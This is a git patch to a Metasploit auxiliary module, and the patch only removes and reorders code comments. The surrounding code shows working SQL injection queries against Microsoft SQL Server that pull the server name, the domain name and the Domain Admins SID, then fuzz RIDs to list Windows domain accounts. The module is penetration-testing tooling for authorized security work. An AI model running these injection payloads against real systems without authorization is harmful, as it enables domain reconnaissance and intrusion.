From cd43f83cd79d1ba9ada27db1f20b8b39f8ce5b15 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 25 Nov 2014 13:40:53 -0600
Subject: [PATCH] Delete unnecessary comments

* No need to comment every step, just relevant
comments to undrestad code.
---
 .../mssql/mssql_enum_domain_accounts_sqli.rb  | 35 +++----------------
 1 file changed, 4 insertions(+), 31 deletions(-)

diff --git a/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb b/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb
index bcfc5600c3..def6ae4764 100644
--- a/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb
+++ b/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb
@@ -39,7 +39,6 @@ class Metasploit3 < Msf::Auxiliary
 
   def run
 
-    # Get the server name
     print_status("#{peer} - Grabbing the server and domain name...")
     db_server_name = get_server_name
     if db_server_name.nil?
@@ -49,7 +48,6 @@ class Metasploit3 < Msf::Auxiliary
       print_good("#{peer} - Server name: #{db_server_name}")
     end
 
-    # Get the domain name of the SQL Server
     db_domain_name = get_domain_name
     if db_domain_name.nil?
       print_error("#{peer} - Unable to grab domain name")
@@ -64,7 +62,6 @@ class Metasploit3 < Msf::Auxiliary
       print_good("#{peer} - Domain name: #{db_domain_name}")
     end
 
-    # Get the SID for the domain
     print_status("#{peer} - Grabbing the SID for the domain...")
     windows_domain_sid = get_windows_domain_sid(db_domain_name)
     if windows_domain_sid.nil?
@@ -121,17 +118,14 @@ class Metasploit3 < Msf::Auxiliary
     print_status("Query results have been saved to: #{path}")
   end
 
+  # Get the server name
   def get_server_name
-
-    # Setup query
     clue_start = Rex::Text.rand_text_alpha(8 + rand(4))
     clue_end = Rex::Text.rand_text_alpha(8 + rand(4))
     sql = "(select '#{clue_start}'+@@servername+'#{clue_end}')"
 
-    # Run query
     result = mssql_query(sql)
 
-    # Parse result
     if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/
       instance_name = $1
       sql_server_name = instance_name.split('\\')[0]
@@ -142,17 +136,14 @@ class Metasploit3 < Msf::Auxiliary
     sql_server_name
   end
 
+  # Get the domain name of the SQL Server
   def get_domain_name
-
-    # Setup query
     clue_start = Rex::Text.rand_text_alpha(8 + rand(4))
     clue_end = Rex::Text.rand_text_alpha(8 + rand(4))
     sql = "(select '#{clue_start}'+DEFAULT_DOMAIN()+'#{clue_end}')"
 
-    # Run query
     result = mssql_query(sql)
 
-    # Parse result
     if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/
       domain_name = $1
     else
@@ -162,27 +153,20 @@ class Metasploit3 < Msf::Auxiliary
     domain_name
   end
 
+  # Get the SID for the domain
   def get_windows_domain_sid(db_domain_name)
-
-    # Setup group
     domain_group = "#{db_domain_name}\\Domain Admins"
 
-    # Randomized start and stop flags
     clue_start = Rex::Text.rand_text_alpha(8)
     clue_end = Rex::Text.rand_text_alpha(8)
 
-    # Setup query
     sql = "(select cast('#{clue_start}'+(select stuff(upper(sys.fn_varbintohexstr((SELECT SUSER_SID('#{domain_group}')))), 1, 2, ''))+'#{clue_end}' as int))"
 
-    # Run query
     result = mssql_query(sql)
 
-    # Parse result
     if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/
       object_sid = $1
       domain_sid = object_sid[0..47]
-
-      # Return if sid does not resolve for a domain
       return nil if domain_sid.empty?
     else
       domain_sid = nil
@@ -191,14 +175,11 @@ class Metasploit3 < Msf::Auxiliary
     domain_sid
   end
 
-    # Get list of windows accounts,groups,and computer accounts
+  # Get list of windows accounts, groups and computer accounts
   def get_win_domain_users(windows_domain_sid)
-
-    # Randomized start and stop flags
     clue_start = Rex::Text.rand_text_alpha(8)
     clue_end = Rex::Text.rand_text_alpha(8)
 
-    # Create array to store the windws accounts etc
     windows_logins = []
 
     # Fuzz the principal_id parameter (RID in this case) passed to the SUSER_NAME function
@@ -224,23 +205,16 @@ class Metasploit3 < Msf::Auxiliary
         return nil
       end
 
-      # Setup query
       sql = "(SELECT '#{clue_start}'+(SELECT SUSER_SNAME(#{win_sid}) as name)+'#{clue_end}')"
 
-      # Execute query
       result = mssql_query(sql)
 
-      # Parse result
       if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/
         windows_login = $1
 
-        # Print account,group,or computer account etc
         if windows_login.length != 0
           print_status("#{peer} -  #{windows_login}")
-
-          # Add to windows domain object list
           windows_logins.push(windows_login) unless windows_logins.include?(windows_login)
-
           # Verbose output
           vprint_status("#{peer} - Test sid: #{win_sid}")
         end
@@ -248,7 +222,6 @@ class Metasploit3 < Msf::Auxiliary
 
     end
 
-    # Return list of windows accounts
     windows_logins
   end